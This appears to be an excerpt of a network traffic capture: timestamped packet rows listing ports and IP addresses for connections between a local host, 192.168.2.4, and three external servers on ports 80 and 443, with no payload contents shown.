Dec 9, 2024 08:08:25.005558014 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.005595922 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.005676985 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.005719900 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.006880999 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.006922007 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.011446953 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.011462927 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.011507988 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.011516094 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.011554003 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.011554003 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.020524979 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.020540953 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.020601034 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.020610094 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.020662069 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.028704882 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.028723955 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.028772116 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.028788090 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.028824091 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.028825045 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.038631916 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.038646936 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.038733006 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.038743973 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.038830996 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.046864986 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.046880007 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.046956062 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.046956062 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.046963930 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.047002077 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.083914042 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.083957911 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.084001064 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.084003925 CET	49806	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:25.084028959 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.084069967 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.084080935 CET	49806	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:25.084084988 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.084126949 CET	49806	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:25.084131956 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.092225075 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.092303038 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.092307091 CET	49806	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:25.092313051 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.092359066 CET	49806	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:25.100538969 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.105479956 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.105499983 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.105562925 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.105571985 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.105586052 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.105614901 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.129728079 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.129801989 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.129884005 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.129934072 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.130479097 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.130522013 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.130526066 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.130570889 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.131556988 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.131583929 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.131608009 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.131637096 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.132658005 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.132698059 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.132802963 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.132843971 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.133867025 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.133908033 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.133970022 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.134017944 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.135102034 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.135390043 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.135421038 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.135421038 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.136171103 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.136214018 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.136400938 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.136459112 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.137379885 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.137422085 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.137459040 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.137507915 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.138521910 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.138567924 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.138627052 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.138667107 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.139686108 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.139727116 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.139790058 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.139827967 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.140908003 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.140954971 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.140988111 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.141028881 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.142055035 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.142103910 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.142139912 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.142182112 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.143229961 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.143265963 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.143407106 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.143445969 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.144406080 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.144440889 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.144448042 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.144478083 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.145575047 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.145589113 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.145632029 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.145643950 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.146533012 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.146584034 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.146610975 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.146620035 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.146656036 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.146671057 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.146734953 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.146775007 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.146848917 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.146889925 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.147916079 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.147957087 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.147994041 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.148047924 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.148644924 CET	49806	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:25.148657084 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.149136066 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.149147987 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.149175882 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.149189949 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.150274992 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.150314093 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.150320053 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.150356054 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.151405096 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.151451111 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.151544094 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.151586056 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.152609110 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.152647972 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.152684927 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.152719021 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.153757095 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.153800011 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.153959036 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.153999090 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.154980898 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.155021906 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.155087948 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.155128002 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.156119108 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.156157970 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.156194925 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.156239033 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.157299995 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.157341957 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.157388926 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.157428980 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.158504963 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.158548117 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.158611059 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.158652067 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.159651041 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.159693003 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.159764051 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.159804106 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.160800934 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.160845041 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.160984993 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.161021948 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.161971092 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.162014961 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.162111998 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.162158966 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.163192034 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.163242102 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.163280010 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.163328886 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.164319992 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.164369106 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.164437056 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.164477110 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.165572882 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.165640116 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.165652037 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.165762901 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.166713953 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.166769981 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.166835070 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.166882038 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.167843103 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.167886972 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.167886972 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.167941093 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.168993950 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.169039965 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.169071913 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.169110060 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.170211077 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.170267105 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.170277119 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.170306921 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.171422958 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.171472073 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.171493053 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.171536922 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.172521114 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.172564030 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.172571898 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.172604084 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.173707962 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.173768997 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.173940897 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.173986912 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.174909115 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.174956083 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.175029993 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.175071955 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.176141024 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.176192999 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.176227093 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.176270962 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.177195072 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.177242041 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.177345037 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.177385092 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.178406954 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.178474903 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.178491116 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.178534985 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.179584026 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.179646015 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.179646969 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.179691076 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.180730104 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.180773020 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.180860996 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.180902004 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.181907892 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.181926012 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.181948900 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.181963921 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.183043003 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.183084011 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.183151960 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.183192015 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.184216976 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.184258938 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.184322119 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.184361935 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.185436010 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.185481071 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.185539961 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.185584068 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.186615944 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.186665058 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.186721087 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.186760902 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.187925100 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.187967062 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.188512087 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.188554049 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.189012051 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.189064980 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.189069986 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.189106941 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.190224886 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.190277100 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.190330029 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.190375090 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.191243887 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.191303015 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.192785978 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.192807913 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.192878962 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.192892075 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.192980051 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.196649075 CET	49806	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:25.198729992 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.198746920 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.198816061 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.198824883 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.198879004 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.203258991 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.205498934 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.205516100 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.205570936 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.205583096 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.205594063 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.205632925 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.211941004 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.211963892 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.212024927 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.212025881 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.212034941 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.212085009 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.218249083 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.218262911 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.218341112 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.218349934 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.218373060 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.218385935 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.224906921 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.224925995 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.224965096 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.224972963 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.224992037 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.225027084 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.243653059 CET	49806	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:25.243660927 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.280364037 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.280396938 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.280411959 CET	49806	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:25.280420065 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.280471087 CET	49806	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:25.280474901 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.280488014 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.280525923 CET	49806	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:25.280724049 CET	49806	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:25.280738115 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.280746937 CET	49806	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:25.280750990 CET	443	49806	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:25.297501087 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.297522068 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.297583103 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.297594070 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:25.297626972 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.297662020 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:25.321878910 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.321934938 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.322038889 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.322038889 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.322510958 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.322556973 CET	49807	80	192.168.2.4	185.215.113.16
